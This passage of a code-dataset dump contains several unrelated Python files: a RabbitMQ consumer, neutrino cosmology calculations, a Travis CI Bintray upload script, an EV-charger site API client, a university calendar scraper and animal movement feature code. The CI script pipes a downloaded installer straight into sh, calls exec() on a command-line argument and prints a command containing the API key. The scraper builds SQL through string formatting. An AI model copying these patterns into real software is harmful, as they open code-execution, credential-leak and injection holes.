exchange_type='direct')\n\n\nchannel.queue_declare(queue='redis')\nchannel.queue_declare(queue='mailgun')\n\nchannel.queue_bind(exchange='event',\n queue='redis', routing_key='mymsg')\n\nchannel.queue_bind(exchange='event',\n queue='mailgun', routing_key='mymsg')\n\nprint(' [*] Waiting for logs. 
To exit press CTRL+C')\n\n\ndef callback(ch, method, properties, body):\n print(\" [x] %r\" % body)\n\nchannel.basic_consume(callback,\n queue='redis')\n\nchannel.start_consuming()\n","sub_path":"rabbitmq_examples/receive_event.py","file_name":"receive_event.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"12721775","text":"import logging\nfrom astropy import units as u\nimport astropy\nfrom astropy.cosmology import Planck15 as cosmo\nfrom astropy.coordinates import Distance\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nfrom flarestack.shared import plots_dir\nfrom flarestack.core.energy_pdf import EnergyPDF, read_e_pdf_dict\n\ndef get_diffuse_flux_at_100TeV(fit=\"joint_15\"):\n \"\"\"Returns value for the diffuse neutrino flux, based on IceCube's data.\n The fit can be specified (either 'Joint' or 'Northern Tracks') to get\n corresponding values from different analyses\n\n :param fit: Fit of diffuse flux to be used\n :return: Best fit diffuse flux at 100 TeV, and best fit spectral index\n \"\"\"\n\n if fit in [\"joint_15\", \"joint\"]:\n # IceCube Joint Best Fit\n # (https://arxiv.org/abs/1507.03991)\n all_flavour_diffuse_flux = 6.7 * 10 ** -18 * (\n u.GeV ** -1 * u.cm ** -2 * u.s ** -1 * u.sr ** -1\n )\n diffuse_flux = all_flavour_diffuse_flux / 3.\n diffuse_gamma = 2.5\n\n if fit == \"joint\":\n logging.warning(\"Fit 'joint' was used, without a specified year.\"\n \"Assuming 'joint_15', from https://arxiv.org/abs/1507.03991.\")\n\n elif fit in [\"northern_tracks_17\"]:\n # Best fit from the Northern Tracks 'Diffuse Sample'\n # https://pos.sissa.it/301/1005/pdf\n diffuse_flux = 1.01 * 10 ** -18 * (\n u.GeV ** -1 * u.cm ** -2 * u.s ** -1 * u.sr ** -1\n )\n diffuse_gamma = 2.19\n\n elif fit in [\"northern_tracks_19\", \"northern_tracks\"]:\n # Best fit from the Northern Tracks 'Diffuse Sample'\n # https://arxiv.org/abs/1908.09551\n diffuse_flux = 1.44 * 10 ** -18 * (\n u.GeV ** -1 * u.cm ** -2 * u.s ** -1 * u.sr ** -1\n )\n diffuse_gamma = 2.29\n\n if fit == \"northern_tracks\":\n logging.warning(\"Fit 'northern_tracks' was used, without a specified year.\"\n \"Assuming 'northern_tracks_19', from https://arxiv.org/abs/1908.09551.\")\n\n else:\n raise Exception(\"Fit '{0}' not recognised! 
\\n\"\n \"The following fits are available: \\n\"\n \"'joint_15', 'northern_tracks_17', 'northern_tracks_19'\".format(fit, ))\n\n return diffuse_flux, diffuse_gamma\n\n\ndef get_diffuse_flux_at_1GeV(fit=\"joint_15\"):\n \"\"\"Returns the IceCube diffuse flux at 1GeV, to match flarestack\n convention for flux measurements.\n\n :param fit: Fit of diffuse flux to be used\n :return: Best fit diffuse flux at 1 GeV, and best fit spectral index\n \"\"\"\n diffuse_flux, diffuse_gamma = get_diffuse_flux_at_100TeV(fit)\n return diffuse_flux * (10 ** 5) ** diffuse_gamma, diffuse_gamma\n\n\ndef sfr_madau(z):\n \"\"\"\n star formation history\n http://arxiv.org/pdf/1403.0007v3.pdf\n Madau & Dickinson 2014, Equation 15\n result is in solar masses/year/Mpc^3\n\n \"\"\"\n rate = 0.015 * (1+z)**2.7 / (1 + ((1+z)/2.9)**5.6) /(\n u.Mpc**3 * u.year\n )\n\n return rate\n\n\ndef sfr_clash_candels(z):\n \"\"\"\n star formation history\n https://arxiv.org/pdf/1509.06574.pdf\n\n result is in solar masses/year/Mpc^3\n\n Can match Figure 6, if the h^3 factor is divided out\n \"\"\"\n rate = 0.015 * (1+z)**5.0 / (1 + ((1+z)/1.5)**6.1) /(\n u.Mpc**3 * u.year\n )\n\n return rate\n\n\ndef integrate_over_z(f, zmin=0.0, zmax=8.0):\n\n nsteps = 1e3\n\n zrange, step = np.linspace(zmin, zmax, int(nsteps + 1), retstep=True)\n int_sum = 0.0\n\n for i, z in enumerate(zrange[1:-1]):\n int_sum += 0.5 * step * (f(z) + f(zrange[i+2]))\n\n return int_sum\n\n\ndef cumulative_z(f, zrange):\n\n ints = []\n\n nsteps = 1e3 + 1\n\n if isinstance(zrange, np.ndarray):\n step = zrange[1] - zrange[0]\n else:\n zrange, step = np.linspace(0.0, zrange, int(nsteps + 1), retstep=True)\n\n int_sum = 0.0\n\n for i, z in enumerate(zrange[1:-1]):\n int_sum += 0.5 * step * (f(z) + f(zrange[i + 2]))\n ints.append(astropy.units.quantity.Quantity(int_sum))\n\n return ints\n\n\ndef define_cosmology_functions(rate, nu_e_flux_1GeV, gamma,\n nu_bright_fraction=1.):\n\n def rate_per_z(z):\n \"\"\" Equals rate as a function of z, multiplied by the differential\n comoving volume, multiplied by 4pi steradians for full sphere,\n multiplied by the neutrino-bright fraction, and then divided by (1+z)\n to account for time dilation which reduces the rate of transients at\n high redshifts.\n\n :param z: Redshift\n :return: Transient rate in shell at that redshift\n \"\"\"\n return rate(z) * cosmo.differential_comoving_volume(z) * \\\n nu_bright_fraction * (4 * np.pi * u.sr) / (1+z)\n\n def nu_flux_per_source(z):\n \"\"\"Calculate the time-integrated neutrino flux contribution on Earth\n per source. Equal to the flux normalisation per source at 1GeV,\n divided by the sphere 4 pi dl^2 to give the flux at 1GeV on Earth.\n This then needs to be corrected by factors of (1+z)-gamma to account\n for the redshifting of the spectrum to lower energy values. This\n assumes that he power law extends beyond the traditional icecube\n sensitivity range.\n\n :param z: Redshift of shell\n :return: Neutrino flux from shell at Earth\n \"\"\"\n return nu_e_flux_1GeV * (1 + z) ** (3 - gamma) / (\n 4 * np.pi * Distance(z=z).to(\"cm\")**2)\n\n def nu_flux_per_z(z):\n \"\"\"Calculate the neutrino flux contribution on Earth that each\n redshift shell contributes. Equal to the rate of sources per shell,\n multiplied by the flux normalisation per source at 1GeV, divided by\n the sphere 4 pi dl^2 to give the flux at 1GeV on Earth. This then\n needs to be corrected by factors of (1+z)-gamma to account for the\n redshifting of the spectrum to lower energy values. 
This assumes that\n the power law extends beyond the traditional icecube sensitivity range.\n\n :param z: Redshift of shell\n :return: Neutrino flux from shell at Earth\n \"\"\"\n return rate_per_z(z).to(\"s-1\") * nu_flux_per_source(z) / (\n 4 * np.pi * u.sr)\n\n def cumulative_nu_flux(z):\n \"\"\"Calculates the integrated neutrino flux on Earth for all sources\n lying within a sphere up to the given redshift. Uses numerical\n intergration to calculate this, given the source rate and neutrino\n flux per source.\n\n :param z: Redshift up to which neutrino flux is integrated\n :return: Cumulative neutrino flux at 1 GeV\n \"\"\"\n return cumulative_z(nu_flux_per_z, z)\n\n return rate_per_z, nu_flux_per_z, nu_flux_per_source, cumulative_nu_flux\n\n\ndef calculate_transient_cosmology(e_pdf_dict, rate, name, zmax=8.,\n nu_bright_fraction=1.0,\n diffuse_fraction=None,\n diffuse_fit=\"joint_15\"):\n\n e_pdf_dict = read_e_pdf_dict(e_pdf_dict)\n\n diffuse_flux, diffuse_gamma = get_diffuse_flux_at_1GeV(diffuse_fit)\n\n logging.info(\"Using the {0} best fit values of the diffuse flux.\".format(diffuse_fit))\n # print \"Raw Diffuse Flux at 1 GeV:\", diffuse_flux / (4 * np.pi * u.sr)\n logging.info(\"Diffuse Flux at 1 GeV: {0}\".format(diffuse_flux))\n logging.info(\"Diffuse Spectral Index is {0}\".format(diffuse_gamma))\n\n if \"gamma\" not in e_pdf_dict:\n logging.warning(\"No spectral index has been specified. \"\n \"Assuming source has spectral index matching diffuse flux\")\n e_pdf_dict[\"gamma\"] = diffuse_gamma\n\n energy_pdf = EnergyPDF.create(e_pdf_dict)\n nu_e = e_pdf_dict[\"source_energy_erg\"]\n gamma = e_pdf_dict[\"gamma\"]\n\n logging.info(name)\n logging.info(\"Neutrino Energy is {0}\".format(nu_e))\n logging.info(\"Rate is {0}\".format(rate(0.0)))\n\n savedir = plots_dir + \"cosmology/\" + name + \"/\"\n\n try:\n os.makedirs(savedir)\n except OSError:\n pass\n\n fluence_conversion = energy_pdf.fluence_integral() * u.GeV ** 2\n\n nu_e = nu_e.to(\"GeV\") / fluence_conversion\n\n zrange, step = np.linspace(0.0, zmax, int(1 + 1e3), retstep=True)\n\n rate_per_z, nu_flux_per_z, nu_flux_per_source, cumulative_nu_flux = \\\n define_cosmology_functions(rate, nu_e, gamma, nu_bright_fraction)\n\n logging.info(\"Cumulative sources at z=8.0: {:.3E}\".format(cumulative_z(rate_per_z, 8.0)[-1].value))\n\n nu_at_horizon = cumulative_nu_flux(8)[-1]\n\n logging.info(\"Cumulative flux at z=8.0 (1 GeV): {:.3E}\".format(nu_at_horizon))\n logging.info(\"Cumulative annual flux at z=8.0 (1 GeV): {:.3E}\".format((\n nu_at_horizon * u.yr).to(\"GeV-1 cm-2 sr-1\")))\n\n ratio = nu_at_horizon.value / diffuse_flux.value\n logging.info(\"Fraction of diffuse flux {0}\".format(ratio))\n logging.info(\"Cumulative neutrino flux {0}\".format(nu_at_horizon))\n logging.debug(\"Diffuse neutrino flux {0}\".format(diffuse_flux))\n\n if diffuse_fraction is not None:\n logging.info(\"Scaling flux so that, at z=8, the contribution is equal to {0}\".format(diffuse_fraction))\n nu_e *= diffuse_fraction / ratio\n logging.info(\"Neutrino Energy rescaled to {0}\".format((nu_e * fluence_conversion).to(\"erg\")))\n\n plt.figure()\n plt.plot(zrange, rate(zrange))\n plt.yscale(\"log\")\n plt.xlabel(\"Redshift\")\n plt.ylabel(r\"Rate [Mpc$^{-3}$ year$^{-1}$]\")\n plt.tight_layout()\n plt.savefig(savedir + 'rate.pdf')\n plt.close()\n\n plt.figure()\n plt.plot(zrange, rate_per_z(zrange) / rate(zrange))\n plt.yscale(\"log\")\n plt.xlabel(\"Redshift\")\n plt.ylabel(r\"Differential Comoving Volume [Mpc$^{3}$ dz]\")\n plt.tight_layout()\n 
plt.savefig(savedir + 'comoving_volume.pdf')\n plt.close()\n\n logging.debug(\"Sanity Check:\")\n logging.debug(\"Integrated Source Counts \\n\")\n\n for z in [0.01, 0.08, 0.1, 0.2, 0.3, 0.7, 8]:\n logging.debug(\"{0}, {1}, {2}\".format(\n z, Distance(z=z).to(\"Mpc\"), cumulative_z(rate_per_z, z)[-1])\n )\n\n nearby = 0.3\n\n logging.info(\n \"Fraction from nearby (z<{0}) sources: {1}\".format(\n nearby, cumulative_nu_flux(nearby)[-1] / nu_at_horizon\n )\n )\n\n plt.figure()\n plt.plot(zrange, rate_per_z(zrange))\n plt.yscale(\"log\")\n plt.ylabel(\"Differential Source Rate [year$^{-1}$ dz]\")\n plt.xlabel(\"Redshift\")\n plt.tight_layout()\n plt.savefig(savedir + 'diff_source_count.pdf')\n plt.close()\n\n plt.figure()\n plt.plot(zrange[1:-1], [x.value for x in cumulative_z(rate_per_z, zrange)])\n plt.yscale(\"log\")\n plt.ylabel(\"Cumulative Sources\")\n plt.xlabel(\"Redshift\")\n plt.tight_layout()\n plt.savefig(savedir + 'integrated_source_count.pdf')\n plt.close()\n\n plt.figure()\n plt.plot(zrange[1:-1], nu_flux_per_z(zrange[1:-1]))\n plt.yscale(\"log\")\n plt.xlabel(\"Redshift\")\n plt.tight_layout()\n plt.savefig(savedir + 'diff_vol_contribution.pdf')\n plt.close()\n\n cum_nu = [x.value for x in cumulative_nu_flux(zrange)]\n\n plt.figure()\n plt.plot(zrange[1:-1], cum_nu)\n plt.yscale(\"log\")\n plt.xlabel(\"Redshift\")\n plt.ylabel(r\"Cumulative Neutrino Flux [ GeV$^{-1}$ cm$^{-2}$ s$^{-1}$ ]\")\n plt.axhline(y=diffuse_flux.value, color=\"red\", linestyle=\"--\")\n plt.tight_layout()\n plt.savefig(savedir + 'int_nu_flux_contribution.pdf')\n plt.close()\n\n plt.figure()\n plt.plot(zrange[1:-1],\n [nu_flux_per_z(z).value for z in zrange[1:-1]])\n plt.yscale(\"log\")\n plt.xlabel(\"Redshift\")\n plt.ylabel(\n r\"Differential Neutrino Flux [ GeV$^{-1}$ cm$^{-2}$ s$^{-1}$ dz]\")\n plt.axhline(y=diffuse_flux.value, color=\"red\", linestyle=\"--\")\n plt.tight_layout()\n plt.savefig(savedir + 'diff_nu_flux_contribution.pdf')\n plt.close()\n\n plt.figure()\n plt.plot(zrange[1:-1],\n [(nu_flux_per_source(z)).value for z in zrange[1:-1]])\n plt.yscale(\"log\")\n plt.xlabel(\"Redshift\")\n plt.ylabel(\n r\"Time-Integrated Flux per Source [ GeV$^{-1}$ cm$^{-2}$]\")\n plt.tight_layout()\n plt.savefig(savedir + 'nu_flux_per_source_contribution.pdf')\n plt.close()\n\n return nu_at_horizon\n\n\n# def estimate_northern_neutrinos(diffuse_fit=\"joint\"):\n# diffuse_flux, diffuse_gamma = get_diffuse_flux_at_1GeV(diffuse_fit)\n#\n# print(\"\\n\")\n#\n# print(\"Let's assume that 50% of the diffuse flux is distributed on a \\n\" \\\n# \"single source in the northern sky. That's unrealistic, but \\n \" \\\n# \"should give us an idea of expected neutrino numbers! 
\\n\")\n#\n# source = np.load(ps_catalogue_name(0.2))\n#\n# inj_kwargs = {\n# \"injection_time_pdf\": {\n# \"time_pdf_name\": \"Steady\"\n# },\n# \"injection_energy_pdf\": {\n# \"energy_pdf_name\": \"PowerLaw\",\n# \"gamma\": diffuse_gamma,\n# \"flux_at_1_gev\": diffuse_flux*0.5\n# }\n# }\n#\n# calculate_neutrinos(source[0], IC86_1_dict, inj_kwargs)\n\n#\n# if __name__ == \"__main__\":\n# estimate_northern_neutrinos(diffuse_fit=\"joint\")\n# estimate_northern_neutrinos(diffuse_fit=\"northern_tracks\")\n","sub_path":"flarestack/utils/neutrino_cosmology.py","file_name":"neutrino_cosmology.py","file_ext":"py","file_size_in_byte":13134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"52035771","text":"import os, argparse\n\n# Please read pipeline_instructions.py before working on this file\n\nGIT_REPO_NAME = os.environ[\"GIT_REPO_NAME\"]\nARCH = os.environ[\"ARCH\"]\nBT_REPO_RPM = os.environ[\"BINTRAY_REPO_RPM\"]\nBT_SUBJECT = os.environ[\"BINTRAY_SUBJECT\"]\nBT_USER = os.environ[\"BINTRAY_USER\"]\nBT_KEY = os.environ[\"BINTRAY_KEY\"]\nPKG_VERSION = os.environ[\"PKG_VERSION\"]\nPKG_PATH_RPM = GIT_REPO_NAME + \"/\" + ARCH + \"/\"\nPKG_NAME = GIT_REPO_NAME + \"-\" + ARCH + \"-\" + PKG_VERSION\nPKG_NAME_RPM = PKG_NAME + \".rpm\"\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-step_name\")\nargs = parser.parse_args()\n\ndef after_success():\n package()\n deploy()\n \ndef package():\n package_rpm()\n \ndef deploy():\n print(\"Running install_jfrog_cli()\")\n install_jfrog_cli()\n print(\"Running config_jfrog_cli()\")\n config_jfrog_cli()\n \n # rpm_upload_suffix = PKG_NAME_RPM + \" \" + create_pkg_location(BT_REPO_RPM) + \" \" + PKG_PATH_RPM\n rpm_upload_suffix = r'\"(*.rpm)\"' + \" \" + create_pkg_location(BT_REPO_RPM) + \" \" + PKG_PATH_RPM\n \n upload_bintray(rpm_upload_suffix)\n \ndef create_pkg_location(bt_repo_name):\n return BT_SUBJECT + \"/\" + bt_repo_name + \"/\" + GIT_REPO_NAME + \"/\" + PKG_VERSION\n \ndef package_rpm():\n print(\"Packaging RPM\")\n package_cmd=(\n \"go-bin-rpm generate\" +\n \" --file rpm-creation-data.json\" +\n \" --version \" + PKG_VERSION + \n \" --arch \" + ARCH + \n \" -o \" + PKG_NAME_RPM)\n \n print(\"RPM command : \" + \"docker run -v $PWD:/mnt/travis solvingj/go-bin-rpm /bin/sh -c \\\"\" + package_cmd + \"\\\"\")\n os.system(\"docker run -v $PWD:/mnt/travis solvingj/go-bin-rpm /bin/sh -c \\\"\" + package_cmd + \"\\\"\")\n\ndef install_jfrog_cli():\n install_command=(\"curl -fL https://getcli.jfrog.io | sh\")\n print(\"Installing jfrog client with command: \" + install_command)\n os.system(install_command)\n \ndef config_jfrog_cli():\n configure_command=(\n \"./jfrog bt config --user \" + BT_USER + \n \" --key \" + BT_KEY + \n \" --licenses MIT\")\n print(\"Configuring jfrog client for bintray uploads with command: \" + configure_command)\n os.system(configure_command)\n \ndef upload_bintray(upload_cmd_suffix):\n upload_cmd_prefix = \"./jfrog bt upload --override=true --publish=true \"\n print(\"Uploading files to Bintray with command: \" + upload_cmd_prefix + upload_cmd_suffix)\n os.system(upload_cmd_prefix + upload_cmd_suffix)\n \n# This actually executes the step, must be after all methods are defined.\nexec(args.step_name + \"()\")","sub_path":"ci/travis_pipeline.py","file_name":"travis_pipeline.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"212211738","text":"import logging\nfrom 
typing import Any, Dict, List\n\nfrom .utils import BaseDict\nfrom .charger import Charger\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass Circuit(BaseDict):\n def __init__(self, data: Dict[str, Any], site: Any, easee: Any):\n super().__init__(data)\n self.id: int = data[\"id\"]\n self.site = site\n self.easee = easee\n\n async def set_dynamic_current(self, currentP1: int, currentP2: int = None, currentP3: int = None):\n \"\"\" Set circuit dynamic current \"\"\"\n json = {\n \"dynamicCircuitCurrentP1\": currentP1,\n \"dynamicCircuitCurrentP2\": currentP2 if currentP2 is not None else currentP1,\n \"dynamicCircuitCurrentP3\": currentP3 if currentP3 is not None else currentP1,\n }\n return await self.easee.post(f\"/api/sites/{self.site.id}/circuits/{self.id}/settings\", json=json)\n\n async def set_max_current(self, currentP1: int, currentP2: int = None, currentP3: int = None):\n \"\"\" Set circuit max current \"\"\"\n json = {\n \"maxCircuitCurrentP1\": currentP1,\n \"maxCircuitCurrentP2\": currentP2 if currentP2 is not None else currentP1,\n \"maxCircuitCurrentP3\": currentP3 if currentP3 is not None else currentP1,\n }\n return await self.easee.post(f\"/api/sites/{self.site.id}/circuits/{self.id}/settings\", json=json)\n\n async def set_rated_current(self, ratedCurrentFuseValue: int):\n \"\"\" Set circuit rated current - requires elevated access (installers only) \"\"\"\n json = {\"ratedCurrentFuseValue\": ratedCurrentFuseValue}\n return await self.easee.post(f\"/api/sites/{self.site.id}/circuits/{self.id}/rated_current\", json=json)\n\n def get_chargers(self) -> List[Charger]:\n return [Charger(c, self.easee, self.site, self) for c in self[\"chargers\"]]\n\n\nclass Site(BaseDict):\n def __init__(self, data: Dict[str, Any], easee: Any):\n super().__init__(data)\n self.id: int = data[\"id\"]\n self.easee = easee\n\n def get_circuits(self) -> List[Circuit]:\n return [Circuit(c, self, self.easee) for c in self[\"circuits\"]]\n\n async def set_name(self, name: str):\n \"\"\" Set name for the site \"\"\"\n json = {**self.get_data(), \"name\": name}\n return await self.easee.put(f\"/api/sites/{self.id}\", json=json)\n\n async def set_currency(self, currency: str):\n \"\"\" Set currency for the site \"\"\"\n json = {**self.get_data(), \"currencyId\": currency}\n return await self.easee.put(f\"/api/sites/{self.id}\", json=json)\n\n async def set_price(\n self, costPerKWh: float, vat: float = None, currency: str = None, costPerKwhExcludeVat: float = None,\n ):\n \"\"\" Set price per kWh for the site \"\"\"\n\n json = {\n \"costPerKWh\": costPerKWh,\n }\n\n if vat is None:\n vat = self.get(\"vat\")\n\n if currency is None:\n currency = self.get(\"currencyId\")\n\n if costPerKwhExcludeVat is None:\n costPerKwhExcludeVat = costPerKWh / (100.0 + vat) * 100.0\n\n json = {\n \"currencyId\": currency,\n \"costPerKWh\": costPerKWh,\n \"vat\": vat,\n \"costPerKwhExcludeVat\": costPerKwhExcludeVat,\n }\n\n return await self.easee.post(f\"/api/sites/{self.id}/price\", json=json)\n","sub_path":"easee/site.py","file_name":"site.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"485919653","text":"from bs4 import BeautifulSoup\nimport requests\nimport re\nimport csv\nfrom unidecode import unidecode\nimport json\n\nfrom entities import entities\n\ncalFile = open('calendario2018-2.csv', 'w')\n\ncalWriter = csv.writer(calFile)\n\ncalWriter.writerow(['dataInicio', 'dataFim', 'entidade', 'info'])\n\nurl = 
'https://www.dac.unicamp.br/portal/calendario/2018/graduacao'\n\n# url = 'https://www.dac.unicamp.br/portal/calendario/2018/pos-graduacao'\n# url = 'https://www.dac.unicamp.br/portal/calendario/2018/medicina'\n\nfilename = 'calendario.sql'\n\nsource = requests.get(url).text\nmesDict = {'Janeiro': '01', 'Fevereiro': '02', 'Março': '03', 'Abril': '04', 'Maio': '05', 'Junho': '06', 'Julho': '07', 'Agosto': '08', 'Setembro': '09', 'Outubro': '10', 'Novembro': '11', 'Dezembro': '12'}\n\npage = BeautifulSoup(source, 'lxml')\ntabela = page.find(id='conteudo').find('table')\n\nwith open(filename, 'w') as f:\n pass\n\ninicioAntigo = ''\nfimAntigo = ''\nmesAtual = ''\nanoAtual = ''\n\nd = {}\n\nfor key, value in entities.items():\n k = unidecode(key).lower()\n if isinstance(value, list):\n for item in value:\n i = unidecode(item).lower()\n if i not in d:\n d[i] = k\n else:\n v = unidecode(value).lower()\n if v not in d:\n d[v] = k\n\n# print(json.dumps(d, indent=4, sort_keys=True))\n\nfor tr in tabela.findAll('tr'):\n\n p = tr.findAll('td')\n\n tam = len(p)\n\n if tam == 3:\n\n data = p[0].text.strip()\n\n splitted = re.split(' a | e ', data)\n\n if splitted[0] == '':\n splitted[0] = '-'\n\n dataInicio = splitted[0] + '/' + mesAtual + '/' + anoAtual\n dataFim = dataInicio\n\n if len(splitted) == 2:\n\n fim = splitted[1].split('.')\n if len(fim) == 2:\n dataFim = (fim[0]) + '/' + fim[1] + '/' + anoAtual\n else:\n dataFim = fim[0] + '/' + mesAtual + '/' + anoAtual\n\n entidade = p[1].text.strip()\n info = p[2].text.strip()\n\n inicioAntigo = dataInicio\n fimAntigo = dataFim\n\n if '-' in dataInicio:\n dataInicio = '01' + dataInicio[1:]\n \n if '-' in dataFim:\n dataFim = '01' + dataFim[1:]\n\n semestre = 1 if int(dataInicio[3:5]) < 7 else 2\n\n # print(dataInicio, dataFim, entidade.encode('utf-8'), info.encode('utf-8'))\n calWriter.writerow([dataInicio, dataFim, entidade.encode('utf-8'), info.encode('utf-8')])\n\n entidade = unidecode(entidade.lower())\n \n with open(filename, 'a+') as f:\n f.write(\"INSERT INTO CALENDAR (YEAR_INTEGER, SEMESTER_INTEGER, ENTITY_STR, DESCRIPTION_STR, INITIAL_DATE, END_DATE, URI_STR) VALUES (%s, %s, '%s', '%s', '%s', '%s', '%s');\\n\" %\n (dataInicio[-4:], semestre, d[entidade], info, dataInicio, dataFim, url))\n calWriter.writerow([dataInicio, dataFim, entidade, info])\n\n elif tam == 2:\n\n dataInicio = inicioAntigo\n dataFim = fimAntigo\n entidade = p[0].text.strip()\n info = p[1].text.strip()\n\n # print(dataInicio, dataFim, entidade.encode('utf-8'), info.encode('utf-8'))\n # calWriter.writerow([dataInicio, dataFim, entidade.encode('utf-8'), info.encode('utf-8')])\n calWriter.writerow([dataInicio, dataFim, entidade, info])\n\n elif tam == 1:\n m = p[0].text.strip().split(' de ')\n\n # print(m)\n\n if m[0] in mesDict.keys():\n mesAtual = mesDict[m[0]]\n anoAtual = m[1]\n\n # print('mes atual ', mesAtual, anoAtual)\n","sub_path":"Scripts/Calendario Postgres DB/calendarioScrapper.py","file_name":"calendarioScrapper.py","file_ext":"py","file_size_in_byte":3530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"154749763","text":"import math\nimport datetime, sys\nimport itertools\nfrom db import *\nfrom multiprocessing import Pool\n\nfrom model.dataset_model import Dataset\nfrom model.movement_data_model import Movement_data\n\n\ndef calculate_absolute_features(id):\n \"\"\" Calculate the absolute features for the dataset id.\n This uses multiple processes to speed up the calculation.\n It uses 5 processes - 
defined at pool_size = 5\n\n Keyword arguments:\n id -- id of the dataset\n\n \"\"\"\n print('Absolute features started', file=sys.stderr)\n # print(datetime.datetime.utcnow(), file=sys.stderr)\n\n # create new db session\n session = create_session()\n # get the dataset row from the db\n dataset = session.query(Dataset).filter_by(id=id)\n # get needed values\n dataset[0].status = 'Calculating absolute features'\n dataset[0].progress = 5\n # commit status and progress bar changes\n session.commit()\n\n # tmp query to get all distinct animal ids from the dataset\n tmp = session.query(Movement_data) \\\n .filter_by(dataset_id=id) \\\n .distinct(Movement_data.animal_id)\n\n # list for the distinct animal ids of the dataset\n animal_ids = []\n # save the ids in the list\n for data in tmp:\n animal_ids.append(data.animal_id)\n\n # progress per animal in the loop\n # this is added to the progress bar after an animal's absolute-feature calculation is finished\n progress_per_animal = 45 / (len(animal_ids) + 1)\n\n # Multiprocessing\n pool_size = 5 # 5 parallel processes\n pool = Pool(pool_size)\n # call the absolute_feature_worker method with the needed parameters\n pool.map(absolute_feature_worker,\n zip((range(0, len(animal_ids))), itertools.repeat(id), itertools.repeat(animal_ids),\n itertools.repeat(progress_per_animal), ))\n pool.close()\n # wait until all processes are finished\n pool.join()\n\n session.remove()\n # print('Absolute features finished', file=sys.stderr)\n # print(datetime.datetime.utcnow(), file=sys.stderr)\n\n\ndef absolute_feature_worker(tmp):\n \"\"\" Calculate absolute features for one animal. This is called by a pool.\n\n Keyword arguments:\n tmp - list of parameters\n tmp[0] - parameter i needed for animal_ids\n tmp[1] - id of the dataset\n tmp[2] - list of all animal_ids, used with parameter tmp[0]\n tmp[3] - progress_per_animal, this value is added to the progress bar after the calculation is finished\n\n \"\"\"\n # create a new threaded db session\n session = create_session()\n # rewrite the tmp values to make it easier\n i = tmp[0]\n id = tmp[1]\n animal_ids = tmp[2]\n progress_per_animal = tmp[3]\n # get the dataset\n dataset = session.query(Dataset).filter_by(id=id)\n # needed for speed and acceleration calculation\n fps = dataset[0].fps\n\n # and extract the absolute features\n try:\n # query the movement data of the animal\n animal = session.query(Movement_data) \\\n .filter_by(dataset_id=id, animal_id=animal_ids[i]) \\\n .order_by(Movement_data.time)\n print('Animal ' + str(i), file=sys.stderr)\n\n # calculate the metric distance\n calculate_metric_distance(animal)\n # calculate the speed feature\n calculate_speed(animal, fps)\n # calculate the acceleration feature\n calculate_acceleration(animal, fps)\n # calculate the direction of the moving entity\n calculate_direction(animal)\n\n # change the progress bar\n dataset[0].progress += progress_per_animal\n # add the data to the database\n session.commit()\n\n except Exception as e:\n # Something went wrong when calculating absolute features\n session.rollback()\n dataset[0].status = 'Error - calculating absolute features ' + str(e)[0:200]\n dataset[0].error = True\n # session.commit()\n pass\n # remove the session\n session.remove()\n\n\ndef calculate_metric_distance(animal):\n \"\"\" Calculate the metric distance between consecutive frames.\n\n Keyword arguments:\n animal -- dataset with all time moments\n\n \"\"\"\n animal[0].metric_distance = 0\n number_elem = animal.count()\n for i in range(1, number_elem):\n dist = 
math.hypot(animal[i].get_x() - animal[i - 1].get_x(),\n animal[i].get_y() - animal[i - 1].get_y())\n animal[i].metric_distance = dist\n\n\ndef calculate_speed(animal, fps):\n \"\"\"\n Calculate the averaged speed of an animal\n # TODO: change this; right now it assumes a 25 frames-per-second calculation\n\n Keyword arguments:\n animal -- an animal with all frames\n fps -- frames per second needed to calculate the right speed per second\n\n \"\"\"\n # fps divided by 2, rounded down; the idea is to take the previous (fps/2) and the following (fps/2) frames\n # to calculate the averaged speed\n fps = math.floor(fps / 2) or 1\n number_elem = animal.count()\n for i in range(0, number_elem):\n sum_dist = 0\n for j in range(i - fps, i + fps + 1):\n if j >= 0 and j < number_elem:\n sum_dist = sum_dist + animal[j].metric_distance\n animal[i].speed = sum_dist\n\n\ndef calculate_acceleration(animal, fps):\n \"\"\" Calculate the average acceleration of an animal.\n\n Keyword arguments:\n animal -- animal with all frames\n fps -- frames per second needed to calculate the right speed per second\n\n \"\"\"\n # fps divided by 2, rounded down; the idea is to take the previous (fps/2) and the following (fps/2) frames\n # to calculate the averaged speed\n fps = math.floor(fps / 2) or 1\n number_elem = animal.count()\n for i in range(0, number_elem):\n array_speed = []\n for j in range(i - fps, i + fps + 1):\n if j >= 0 and j < number_elem:\n array_speed.append(animal[j].speed)\n sum_change = sum([array_speed[j + 1] - array_speed[j] for j in range(len(array_speed) - 1)])\n animal[i].acceleration = sum_change\n\n\ndef calculate_direction(animal):\n \"\"\" Calculate the moving direction of the animal.\n\n Keyword arguments:\n animal -- dataset with all time moments\n\n \"\"\"\n animal[0].direction = 0\n number_elem = animal.count()\n for i in range(1, number_elem):\n angle = math.atan2((animal[i].get_y() - animal[i - 1].get_y()), (animal[i].get_x() - animal[i - 1].get_x()))\n\n angle = round(math.degrees(angle), 2)\n animal[i].direction = angle\n","sub_path":"src/app/feature_extraction/absolute_features.py","file_name":"absolute_features.py","file_ext":"py","file_size_in_byte":6403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"202274136","text":"#!/usr/bin/env python\n\n\"\"\"write_mmn_cdi_RMds.py: write out MEG & CDI measurement in tidy-format.\"\"\"\n\nimport datetime\nimport itertools\nimport os.path as op\nimport re\n\nimport numpy as np\nimport pandas as pd\nimport xarray as xr\n\nfrom badbaby import defaults\nfrom badbaby import return_dataframes as rd\n\n# Parameters\ndatadir = defaults.datadir\ndate = datetime.datetime.today()\ndate = '{:%m%d%Y}'.format(date)\nanalysese = ['Individual', 'Oddball']\nages = [2, 6]\nlp = 